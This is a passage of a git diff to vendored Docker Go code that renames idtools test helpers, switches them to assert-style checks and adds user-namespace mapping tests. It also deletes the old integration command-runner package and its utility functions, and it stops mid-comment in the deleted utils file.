+	RequiresRoot(t)
 	dirName, err := ioutil.TempDir("", "mkdirall")
 	if err != nil {
 		t.Fatalf("Couldn't create temp dir: %v", err)
@@ -36,7 +46,7 @@ func TestMkdirAllAs(t *testing.T) {
 	}
 
 	// test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid
-	if err := MkdirAllAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil {
+	if err := MkdirAllAndChown(filepath.Join(dirName, "usr", "share"), 0755, IDPair{UID: 99, GID: 99}); err != nil {
 		t.Fatal(err)
 	}
 	testTree["usr/share"] = node{99, 99}
@@ -49,7 +59,7 @@ func TestMkdirAllAs(t *testing.T) {
 	}
 
 	// test 2-deep new directories--both should be owned by the uid/gid pair
-	if err := MkdirAllAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil {
+	if err := MkdirAllAndChown(filepath.Join(dirName, "lib", "some", "other"), 0755, IDPair{UID: 101, GID: 101}); err != nil {
 		t.Fatal(err)
 	}
 	testTree["lib/some"] = node{101, 101}
@@ -63,7 +73,7 @@ func TestMkdirAllAs(t *testing.T) {
 	}
 
 	// test a directory that already exists; should be chowned, but nothing else
-	if err := MkdirAllAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil {
+	if err := MkdirAllAndChown(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 102, GID: 102}); err != nil {
 		t.Fatal(err)
 	}
 	testTree["usr"] = node{102, 102}
@@ -76,12 +86,10 @@ func TestMkdirAllAs(t *testing.T) {
 	}
 }
 
-func TestMkdirAllNewAs(t *testing.T) {
-
+func TestMkdirAllAndChownNew(t *testing.T) {
+	RequiresRoot(t)
 	dirName, err := ioutil.TempDir("", "mkdirnew")
-	if err != nil {
-		t.Fatalf("Couldn't create temp dir: %v", err)
-	}
+	assert.NilError(t, err)
 	defer os.RemoveAll(dirName)
 
 	testTree := map[string]node{
@@ -91,53 +99,36 @@ func TestMkdirAllNewAs(t *testing.T) {
 		"lib/x86_64":       {45, 45},
 		"lib/x86_64/share": {1, 1},
 	}
-
-	if err := buildTree(dirName, testTree); err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, buildTree(dirName, testTree))
 
 	// test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid
-	if err := MkdirAllNewAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil {
-		t.Fatal(err)
-	}
+	err = MkdirAllAndChownNew(filepath.Join(dirName, "usr", "share"), 0755, IDPair{UID: 99, GID: 99})
+	assert.NilError(t, err)
+
 	testTree["usr/share"] = node{99, 99}
 	verifyTree, err := readTree(dirName, "")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if err := compareTrees(testTree, verifyTree); err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+	assert.NilError(t, compareTrees(testTree, verifyTree))
 
 	// test 2-deep new directories--both should be owned by the uid/gid pair
-	if err := MkdirAllNewAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil {
-		t.Fatal(err)
-	}
+	err = MkdirAllAndChownNew(filepath.Join(dirName, "lib", "some", "other"), 0755, IDPair{UID: 101, GID: 101})
+	assert.NilError(t, err)
 	testTree["lib/some"] = node{101, 101}
 	testTree["lib/some/other"] = node{101, 101}
 	verifyTree, err = readTree(dirName, "")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if err := compareTrees(testTree, verifyTree); err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+	assert.NilError(t, compareTrees(testTree, verifyTree))
 
 	// test a directory that already exists; should NOT be chowned
-	if err := MkdirAllNewAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil {
-		t.Fatal(err)
-	}
+	err = MkdirAllAndChownNew(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 102, GID: 102})
+	assert.NilError(t, err)
 	verifyTree, err = readTree(dirName, "")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if err := compareTrees(testTree, verifyTree); err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
+	assert.NilError(t, compareTrees(testTree, verifyTree))
 }
 
-func TestMkdirAs(t *testing.T) {
-
+func TestMkdirAndChown(t *testing.T) {
+	RequiresRoot(t)
 	dirName, err := ioutil.TempDir("", "mkdir")
 	if err != nil {
 		t.Fatalf("Couldn't create temp dir: %v", err)
@@ -152,7 +143,7 @@ func TestMkdirAs(t *testing.T) {
 	}
 
 	// test a directory that already exists; should just chown to the requested uid/gid
-	if err := MkdirAs(filepath.Join(dirName, "usr"), 0755, 99, 99); err != nil {
+	if err := MkdirAndChown(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 99, GID: 99}); err != nil {
 		t.Fatal(err)
 	}
 	testTree["usr"] = node{99, 99}
@@ -165,12 +156,12 @@ func TestMkdirAs(t *testing.T) {
 	}
 
 	// create a subdir under a dir which doesn't exist--should fail
-	if err := MkdirAs(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, 102, 102); err == nil {
+	if err := MkdirAndChown(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, IDPair{UID: 102, GID: 102}); err == nil {
 		t.Fatalf("Trying to create a directory with Mkdir where the parent doesn't exist should have failed")
 	}
 
 	// create a subdir under an existing dir; should only change the ownership of the new subdir
-	if err := MkdirAs(filepath.Join(dirName, "usr", "bin"), 0755, 102, 102); err != nil {
+	if err := MkdirAndChown(filepath.Join(dirName, "usr", "bin"), 0755, IDPair{UID: 102, GID: 102}); err != nil {
 		t.Fatal(err)
 	}
 	testTree["usr/bin"] = node{102, 102}
@@ -205,8 +196,8 @@ func readTree(base, root string) (map[string]node, error) {
 	}
 
 	for _, info := range dirInfos {
-		s := &syscall.Stat_t{}
-		if err := syscall.Stat(filepath.Join(base, info.Name()), s); err != nil {
+		s := &unix.Stat_t{}
+		if err := unix.Stat(filepath.Join(base, info.Name()), s); err != nil {
 			return nil, fmt.Errorf("Can't stat file %q: %v", filepath.Join(base, info.Name()), err)
 		}
 		tree[filepath.Join(root, info.Name())] = node{int(s.Uid), int(s.Gid)}
@@ -242,6 +233,11 @@ func compareTrees(left, right map[string]node) error {
 	return nil
 }
 
+func delUser(t *testing.T, name string) {
+	_, err := execCmd("userdel", name)
+	assert.Check(t, err)
+}
+
 func TestParseSubidFileWithNewlinesAndComments(t *testing.T) {
 	tmpDir, err := ioutil.TempDir("", "parsesubid")
 	if err != nil {
@@ -269,3 +265,133 @@ dockremap:231072:65536`
 		t.Fatalf("wanted 65536, got %d instead", ranges[0].Length)
 	}
 }
+
+func TestGetRootUIDGID(t *testing.T) {
+	uidMap := []IDMap{
+		{
+			ContainerID: 0,
+			HostID:      os.Getuid(),
+			Size:        1,
+		},
+	}
+	gidMap := []IDMap{
+		{
+			ContainerID: 0,
+			HostID:      os.Getgid(),
+			Size:        1,
+		},
+	}
+
+	uid, gid, err := GetRootUIDGID(uidMap, gidMap)
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(os.Geteuid(), uid))
+	assert.Check(t, is.Equal(os.Getegid(), gid))
+
+	uidMapError := []IDMap{
+		{
+			ContainerID: 1,
+			HostID:      os.Getuid(),
+			Size:        1,
+		},
+	}
+	_, _, err = GetRootUIDGID(uidMapError, gidMap)
+	assert.Check(t, is.Error(err, "Container ID 0 cannot be mapped to a host ID"))
+}
+
+func TestToContainer(t *testing.T) {
+	uidMap := []IDMap{
+		{
+			ContainerID: 2,
+			HostID:      2,
+			Size:        1,
+		},
+	}
+
+	containerID, err := toContainer(2, uidMap)
+	assert.Check(t, err)
+	assert.Check(t, is.Equal(uidMap[0].ContainerID, containerID))
+}
+
+func TestNewIDMappings(t *testing.T) {
+	RequiresRoot(t)
+	_, _, err := AddNamespaceRangesUser(tempUser)
+	assert.Check(t, err)
+	defer delUser(t, tempUser)
+
+	tempUser, err := user.Lookup(tempUser)
+	assert.Check(t, err)
+
+	gids, err := tempUser.GroupIds()
+	assert.Check(t, err)
+	group, err := user.LookupGroupId(string(gids[0]))
+	assert.Check(t, err)
+
+	idMappings, err := NewIDMappings(tempUser.Username, group.Name)
+	assert.Check(t, err)
+
+	rootUID, rootGID, err := GetRootUIDGID(idMappings.UIDs(), idMappings.GIDs())
+	assert.Check(t, err)
+
+	dirName, err := ioutil.TempDir("", "mkdirall")
+	assert.Check(t, err, "Couldn't create temp directory")
+	defer os.RemoveAll(dirName)
+
+	err = MkdirAllAndChown(dirName, 0700, IDPair{UID: rootUID, GID: rootGID})
+	assert.Check(t, err, "Couldn't change ownership of file path. Got error")
+	assert.Check(t, CanAccess(dirName, idMappings.RootPair()), fmt.Sprintf("Unable to access %s directory with user UID:%d and GID:%d", dirName, rootUID, rootGID))
+}
+
+func TestLookupUserAndGroup(t *testing.T) {
+	RequiresRoot(t)
+	uid, gid, err := AddNamespaceRangesUser(tempUser)
+	assert.Check(t, err)
+	defer delUser(t, tempUser)
+
+	fetchedUser, err := LookupUser(tempUser)
+	assert.Check(t, err)
+
+	fetchedUserByID, err := LookupUID(uid)
+	assert.Check(t, err)
+	assert.Check(t, is.DeepEqual(fetchedUserByID, fetchedUser))
+
+	fetchedGroup, err := LookupGroup(tempUser)
+	assert.Check(t, err)
+
+	fetchedGroupByID, err := LookupGID(gid)
+	assert.Check(t, err)
+	assert.Check(t, is.DeepEqual(fetchedGroupByID, fetchedGroup))
+}
+
+func TestLookupUserAndGroupThatDoesNotExist(t *testing.T) {
+	fakeUser := "fakeuser"
+	_, err := LookupUser(fakeUser)
+	assert.Check(t, is.Error(err, "getent unable to find entry \""+fakeUser+"\" in passwd database"))
+
+	_, err = LookupUID(-1)
+	assert.Check(t, is.ErrorContains(err, ""))
+
+	fakeGroup := "fakegroup"
+	_, err = LookupGroup(fakeGroup)
+	assert.Check(t, is.Error(err, "getent unable to find entry \""+fakeGroup+"\" in group database"))
+
+	_, err = LookupGID(-1)
+	assert.Check(t, is.ErrorContains(err, ""))
+}
+
+// TestMkdirIsNotDir checks that mkdirAs() function (used by MkdirAll...)
+// returns a correct error in case a directory which it is about to create
+// already exists but is a file (rather than a directory).
+func TestMkdirIsNotDir(t *testing.T) {
+	file, err := ioutil.TempFile("", t.Name())
+	if err != nil {
+		t.Fatalf("Couldn't create temp dir: %v", err)
+	}
+	defer os.Remove(file.Name())
+
+	err = mkdirAs(file.Name(), 0755, 0, 0, false, false)
+	assert.Check(t, is.Error(err, "mkdir "+file.Name()+": not a directory"))
+}
+
+func RequiresRoot(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go
index 49f67e78c1..d72cc28929 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import (
 	"os"
@@ -11,7 +9,7 @@ import (
 // Platforms such as Windows do not support the UID/GID concept. So make this
 // just a wrapper around system.MkdirAll.
 func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error {
-	if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) {
+	if err := system.MkdirAll(path, mode, ""); err != nil {
 		return err
 	}
 	return nil
@@ -20,6 +18,6 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown
 // CanAccess takes a valid (existing) directory and a uid, gid pair and determines
 // if that uid, gid pair has access (execute bit) to the directory
 // Windows does not require/support this function, so always return true
-func CanAccess(path string, uid, gid int) bool {
+func CanAccess(path string, pair IDPair) bool {
 	return true
 }
diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go
index 9da7975e2c..6272c5a404 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go
@@ -1,4 +1,4 @@
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go
index d98b354cbd..e7c4d63118 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import "fmt"
 
diff --git a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go
index 9703ecbd9d..903ac4501b 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go
deleted file mode 100644
index 76d04e8df5..0000000000
--- a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go
+++ /dev/null
@@ -1,294 +0,0 @@
-package cmd
-
-import (
-	"bytes"
-	"fmt"
-	"io"
-	"os/exec"
-	"path/filepath"
-	"runtime"
-	"strings"
-	"sync"
-	"time"
-
-	"github.com/docker/docker/pkg/system"
-	"github.com/go-check/check"
-)
-
-type testingT interface {
-	Fatalf(string, ...interface{})
-}
-
-const (
-	// None is a token to inform Result.Assert that the output should be empty
-	None string = "<NOTHING>"
-)
-
-type lockedBuffer struct {
-	m   sync.RWMutex
-	buf bytes.Buffer
-}
-
-func (buf *lockedBuffer) Write(b []byte) (int, error) {
-	buf.m.Lock()
-	defer buf.m.Unlock()
-	return buf.buf.Write(b)
-}
-
-func (buf *lockedBuffer) String() string {
-	buf.m.RLock()
-	defer buf.m.RUnlock()
-	return buf.buf.String()
-}
-
-// Result stores the result of running a command
-type Result struct {
-	Cmd      *exec.Cmd
-	ExitCode int
-	Error    error
-	// Timeout is true if the command was killed because it ran for too long
-	Timeout   bool
-	outBuffer *lockedBuffer
-	errBuffer *lockedBuffer
-}
-
-// Assert compares the Result against the Expected struct, and fails the test if
-// any of the expcetations are not met.
-func (r *Result) Assert(t testingT, exp Expected) {
-	err := r.Compare(exp)
-	if err == nil {
-		return
-	}
-
-	_, file, line, _ := runtime.Caller(1)
-	t.Fatalf("at %s:%d\n%s", filepath.Base(file), line, err.Error())
-}
-
-// Compare returns an formatted error with the command, stdout, stderr, exit
-// code, and any failed expectations
-func (r *Result) Compare(exp Expected) error {
-	errors := []string{}
-	add := func(format string, args ...interface{}) {
-		errors = append(errors, fmt.Sprintf(format, args...))
-	}
-
-	if exp.ExitCode != r.ExitCode {
-		add("ExitCode was %d expected %d", r.ExitCode, exp.ExitCode)
-	}
-	if exp.Timeout != r.Timeout {
-		if exp.Timeout {
-			add("Expected command to timeout")
-		} else {
-			add("Expected command to finish, but it hit the timeout")
-		}
-	}
-	if !matchOutput(exp.Out, r.Stdout()) {
-		add("Expected stdout to contain %q", exp.Out)
-	}
-	if !matchOutput(exp.Err, r.Stderr()) {
-		add("Expected stderr to contain %q", exp.Err)
-	}
-	switch {
-	// If a non-zero exit code is expected there is going to be an error.
-	// Don't require an error message as well as an exit code because the
-	// error message is going to be "exit status <code> which is not useful
-	case exp.Error == "" && exp.ExitCode != 0:
-	case exp.Error == "" && r.Error != nil:
-		add("Expected no error")
-	case exp.Error != "" && r.Error == nil:
-		add("Expected error to contain %q, but there was no error", exp.Error)
-	case exp.Error != "" && !strings.Contains(r.Error.Error(), exp.Error):
-		add("Expected error to contain %q", exp.Error)
-	}
-
-	if len(errors) == 0 {
-		return nil
-	}
-	return fmt.Errorf("%s\nFailures:\n%s\n", r, strings.Join(errors, "\n"))
-}
-
-func matchOutput(expected string, actual string) bool {
-	switch expected {
-	case None:
-		return actual == ""
-	default:
-		return strings.Contains(actual, expected)
-	}
-}
-
-func (r *Result) String() string {
-	var timeout string
-	if r.Timeout {
-		timeout = " (timeout)"
-	}
-
-	return fmt.Sprintf(`
-Command: %s
-ExitCode: %d%s, Error: %s
-Stdout: %v
-Stderr: %v
-`,
-		strings.Join(r.Cmd.Args, " "),
-		r.ExitCode,
-		timeout,
-		r.Error,
-		r.Stdout(),
-		r.Stderr())
-}
-
-// Expected is the expected output from a Command. This struct is compared to a
-// Result struct by Result.Assert().
-type Expected struct {
-	ExitCode int
-	Timeout  bool
-	Error    string
-	Out      string
-	Err      string
-}
-
-// Success is the default expected result
-var Success = Expected{}
-
-// Stdout returns the stdout of the process as a string
-func (r *Result) Stdout() string {
-	return r.outBuffer.String()
-}
-
-// Stderr returns the stderr of the process as a string
-func (r *Result) Stderr() string {
-	return r.errBuffer.String()
-}
-
-// Combined returns the stdout and stderr combined into a single string
-func (r *Result) Combined() string {
-	return r.outBuffer.String() + r.errBuffer.String()
-}
-
-// SetExitError sets Error and ExitCode based on Error
-func (r *Result) SetExitError(err error) {
-	if err == nil {
-		return
-	}
-	r.Error = err
-	r.ExitCode = system.ProcessExitCode(err)
-}
-
-type matches struct{}
-
-// Info returns the CheckerInfo
-func (m *matches) Info() *check.CheckerInfo {
-	return &check.CheckerInfo{
-		Name:   "CommandMatches",
-		Params: []string{"result", "expected"},
-	}
-}
-
-// Check compares a result against the expected
-func (m *matches) Check(params []interface{}, names []string) (bool, string) {
-	result, ok := params[0].(*Result)
-	if !ok {
-		return false, fmt.Sprintf("result must be a *Result, not %T", params[0])
-	}
-	expected, ok := params[1].(Expected)
-	if !ok {
-		return false, fmt.Sprintf("expected must be an Expected, not %T", params[1])
-	}
-
-	err := result.Compare(expected)
-	if err == nil {
-		return true, ""
-	}
-	return false, err.Error()
-}
-
-// Matches is a gocheck.Checker for comparing a Result against an Expected
-var Matches = &matches{}
-
-// Cmd contains the arguments and options for a process to run as part of a test
-// suite.
-type Cmd struct {
-	Command []string
-	Timeout time.Duration
-	Stdin   io.Reader
-	Stdout  io.Writer
-	Dir     string
-	Env     []string
-}
-
-// RunCmd runs a command and returns a Result
-func RunCmd(cmd Cmd) *Result {
-	result := StartCmd(cmd)
-	if result.Error != nil {
-		return result
-	}
-	return WaitOnCmd(cmd.Timeout, result)
-}
-
-// RunCommand parses a command line and runs it, returning a result
-func RunCommand(command string, args ...string) *Result {
-	return RunCmd(Cmd{Command: append([]string{command}, args...)})
-}
-
-// StartCmd starts a command, but doesn't wait for it to finish
-func StartCmd(cmd Cmd) *Result {
-	result := buildCmd(cmd)
-	if result.Error != nil {
-		return result
-	}
-	result.SetExitError(result.Cmd.Start())
-	return result
-}
-
-func buildCmd(cmd Cmd) *Result {
-	var execCmd *exec.Cmd
-	switch len(cmd.Command) {
-	case 1:
-		execCmd = exec.Command(cmd.Command[0])
-	default:
-		execCmd = exec.Command(cmd.Command[0], cmd.Command[1:]...)
-	}
-	outBuffer := new(lockedBuffer)
-	errBuffer := new(lockedBuffer)
-
-	execCmd.Stdin = cmd.Stdin
-	execCmd.Dir = cmd.Dir
-	execCmd.Env = cmd.Env
-	if cmd.Stdout != nil {
-		execCmd.Stdout = io.MultiWriter(outBuffer, cmd.Stdout)
-	} else {
-		execCmd.Stdout = outBuffer
-	}
-	execCmd.Stderr = errBuffer
-	return &Result{
-		Cmd:       execCmd,
-		outBuffer: outBuffer,
-		errBuffer: errBuffer,
-	}
-}
-
-// WaitOnCmd waits for a command to complete. If timeout is non-nil then
-// only wait until the timeout.
-func WaitOnCmd(timeout time.Duration, result *Result) *Result {
-	if timeout == time.Duration(0) {
-		result.SetExitError(result.Cmd.Wait())
-		return result
-	}
-
-	done := make(chan error, 1)
-	// Wait for command to exit in a goroutine
-	go func() {
-		done <- result.Cmd.Wait()
-	}()
-
-	select {
-	case <-time.After(timeout):
-		killErr := result.Cmd.Process.Kill()
-		if killErr != nil {
-			fmt.Printf("failed to kill (pid=%d): %v\n", result.Cmd.Process.Pid, killErr)
-		}
-		result.Timeout = true
-	case err := <-done:
-		result.SetExitError(err)
-	}
-	return result
-}
diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go
deleted file mode 100644
index df23442079..0000000000
--- a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go
+++ /dev/null
@@ -1,118 +0,0 @@
-package cmd
-
-import (
-	"runtime"
-	"strings"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestRunCommand(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	var cmd string
-	if runtime.GOOS == "solaris" {
-		cmd = "gls"
-	} else {
-		cmd = "ls"
-	}
-	result := RunCommand(cmd)
-	result.Assert(t, Expected{})
-
-	result = RunCommand("doesnotexists")
-	expectedError := `exec: "doesnotexists": executable file not found`
-	result.Assert(t, Expected{ExitCode: 127, Error: expectedError})
-
-	result = RunCommand(cmd, "-z")
-	result.Assert(t, Expected{
-		ExitCode: 2,
-		Error:    "exit status 2",
-		Err:      "invalid option",
-	})
-	assert.Contains(t, result.Combined(), "invalid option")
-}
-
-func TestRunCommandWithCombined(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	result := RunCommand("ls", "-a")
-	result.Assert(t, Expected{})
-
-	assert.Contains(t, result.Combined(), "..")
-	assert.Contains(t, result.Stdout(), "..")
-}
-
-func TestRunCommandWithTimeoutFinished(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	result := RunCmd(Cmd{
-		Command: []string{"ls", "-a"},
-		Timeout: 50 * time.Millisecond,
-	})
-	result.Assert(t, Expected{Out: ".."})
-}
-
-func TestRunCommandWithTimeoutKilled(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	command := []string{"sh", "-c", "while true ; do echo 1 ; sleep .5 ; done"}
-	result := RunCmd(Cmd{Command: command, Timeout: 1250 * time.Millisecond})
-	result.Assert(t, Expected{Timeout: true})
-
-	ones := strings.Split(result.Stdout(), "\n")
-	assert.Equal(t, len(ones), 4)
-}
-
-func TestRunCommandWithErrors(t *testing.T) {
-	result := RunCommand("/foobar")
-	result.Assert(t, Expected{Error: "foobar", ExitCode: 127})
-}
-
-func TestRunCommandWithStdoutStderr(t *testing.T) {
-	result := RunCommand("echo", "hello", "world")
-	result.Assert(t, Expected{Out: "hello world\n", Err: None})
-}
-
-func TestRunCommandWithStdoutStderrError(t *testing.T) {
-	result := RunCommand("doesnotexists")
-
-	expected := `exec: "doesnotexists": executable file not found`
-	result.Assert(t, Expected{Out: None, Err: None, ExitCode: 127, Error: expected})
-
-	switch runtime.GOOS {
-	case "windows":
-		expected = "ls: unknown option"
-	case "solaris":
-		expected = "gls: invalid option"
-	default:
-		expected = "ls: invalid option"
-	}
-
-	var cmd string
-	if runtime.GOOS == "solaris" {
-		cmd = "gls"
-	} else {
-		cmd = "ls"
-	}
-	result = RunCommand(cmd, "-z")
-	result.Assert(t, Expected{
-		Out:      None,
-		Err:      expected,
-		ExitCode: 2,
-		Error:    "exit status 2",
-	})
-}
diff --git a/vendor/github.com/docker/docker/pkg/integration/utils.go b/vendor/github.com/docker/docker/pkg/integration/utils.go
deleted file mode 100644
index f2089c43c4..0000000000
--- a/vendor/github.com/docker/docker/pkg/integration/utils.go
+++ /dev/null
@@ -1,227 +0,0 @@
-package integration
-
-import (
-	"archive/tar"
-	"errors"
-	"fmt"
-	"io"
-	"os"
-	"os/exec"
-	"path/filepath"
-	"reflect"
-	"strings"
-	"syscall"
-	"time"
-
-	icmd "github.com/docker/docker/pkg/integration/cmd"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/docker/docker/pkg/system"
-)
-
-// IsKilled process the specified error and returns whether the process was killed or not.
-func IsKilled(err error) bool {
-	if exitErr, ok := err.(*exec.ExitError); ok {
-		status, ok := exitErr.Sys().(syscall.WaitStatus)
-		if !ok {
-			return false
-		}
-		// status.ExitStatus() is required on Windows because it does not
-		// implement Signal() nor Signaled(). Just check it had a bad exit
-		// status could mean it was killed (and in tests we do kill)
-		return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0
-	}
-	return false
-}
-
-func runCommandWithOutput(cmd *exec.Cmd) (output string, exitCode int, err error) {
-	exitCode = 0
-	out, err := cmd.CombinedOutput()
-	exitCode = system.ProcessExitCode(err)
-	output = string(out)
-	return
-}
-
-// RunCommandPipelineWithOutput runs the array of commands with the output
-// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do).
-// It returns the final output, the exitCode different from 0 and the error
-// if something bad happened.
-func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) {
-	if len(cmds) < 2 {
-		return "", 0, errors.New("pipeline does not have multiple cmds")
-	}
-
-	// connect stdin of each cmd to stdout pipe of previous cmd
-	for i, cmd := range cmds {
-		if i > 0 {
-			prevCmd := cmds[i-1]
-			cmd.Stdin, err = prevCmd.StdoutPipe()
-
-			if err != nil {
-				return "", 0, fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err)
-			}
-		}
-	}
-
-	// start all cmds except the last
-	for _, cmd := range cmds[:len(cmds)-1] {
-		if err = cmd.Start(); err != nil {
-			return "", 0, fmt.Errorf("starting %s failed with error: %v", cmd.Path, err)
-		}
-	}
-
-	defer func() {
-		var pipeErrMsgs []string
-		// wait all cmds except the last to release their resources
-		for _, cmd := range cmds[:len(cmds)-1] {
-			if pipeErr := cmd.Wait(); pipeErr != nil {
-				pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr))
-			}
-		}
-		if len(pipeErrMsgs) > 0 && err == nil {
-			err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", "))
-		}
-	}()
-
-	// wait on last cmd
-	return runCommandWithOutput(cmds[len(cmds)-1])
-}
-
-// ConvertSliceOfStringsToMap converts a slices of string in a map
-// with the strings as key and an empty string as values.
-func ConvertSliceOfStringsToMap(input []string) map[string]struct{} {
-	output := make(map[string]struct{})
-	for _, v := range input {
-		output[v] = struct{}{}
-	}
-	return output
-}
-
-// CompareDirectoryEntries compares two sets of FileInfo (usually taken from a directory)
-// and returns an error if different.
-func CompareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error {
-	var (
-		e1Entries = make(map[string]struct{})
-		e2Entries = make(map[string]struct{})
-	)
-	for _, e := range e1 {
-		e1Entries[e.Name()] = struct{}{}
-	}
-	for _, e := range e2 {
-		e2Entries[e.Name()] = struct{}{}
-	}
-	if !reflect.DeepEqual(e1Entries, e2Entries) {
-		return fmt.Errorf("entries differ")
-	}
-	return nil
-}
-
-// ListTar lists the entries of a tar.
-func ListTar(f io.Reader) ([]string, error) {
-	tr := tar.NewReader(f)
-	var entries []string
-
-	for {
-		th, err := tr.Next()
-		if err == io.EOF {
-			// end of tar archive
-			return entries, nil
-		}
-		if err != nil {
-			return entries, err
-		}
-		entries = append(entries, th.Name)
-	}
-}
-
-// RandomTmpDirPath provides a temporary path with rand string appended.
-// does not create or checks if it exists.
-func RandomTmpDirPath(s string, platform string) string {
-	tmp := "/tmp"
-	if platform == "windows" {
-		tmp = os.Getenv("TEMP")
-	}
-	path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, stringutils.GenerateRandomAlphaOnlyString(10)))
-	if platform == "windows" {
-		return filepath.FromSlash(path) // Using \
-	}
-	return filepath.ToSlash(path) // Using /
-}
-
-// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping
-// for interval duration. Returns total read bytes. Send true to the
-// stop channel to return before reading to EOF on the reader.
-func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) {
-	buffer := make([]byte, chunkSize)
-	for {
-		var readBytes int
-		readBytes, err = reader.Read(buffer)
-		n += readBytes
-		if err != nil {
-			if err == io.EOF {
-				err = nil
-			}
-			return
-		}
-		select {
-		case <-stop:
-			return
-		case <-time.After(interval):
-		}
-	}
-}
-
-// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc/<pid>/cgroup', and returns
-// a map which cgroup name as key and path as value.
-func ParseCgroupPaths(procCgroupData string) map[string]string {
-	cgroupPaths := map[string]string{}
-	for _, line := range strings.Split(procCgroupData, "\n") {
-		parts := strings.Split(line, ":")
-		if len(parts) != 3 {
-			continue
-		}
-		cgroupPaths[parts[1]] = parts[2]
-	}
-	return cgroupPaths
-}
-
-// ChannelBuffer holds a chan of byte array that can be populate in a goroutine.
-type ChannelBuffer struct {
-	C chan []byte
-}
-
-// Write implements Writer.
-func (c *ChannelBuffer) Write(b []byte) (int, error) {
-	c.C <- b
-	return len(b), nil
-}
-
-// Close closes the go channel.
-func (c *ChannelBuffer) Close() error {
-	close(c.C)
-	return nil
-}
-
-// ReadTimeout reads the content of the channel in the specified byte array with
-// the specified duration as timeout.
-func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) {
-	select {
-	case b := <-c.C:
-		return copy(p[0:], b), nil
-	case <-time.After(n):
-		return -1, fmt.Errorf("timeout reading from channel")
-	}
-}
-
-// RunAtDifferentDate runs the specified function with the given time.
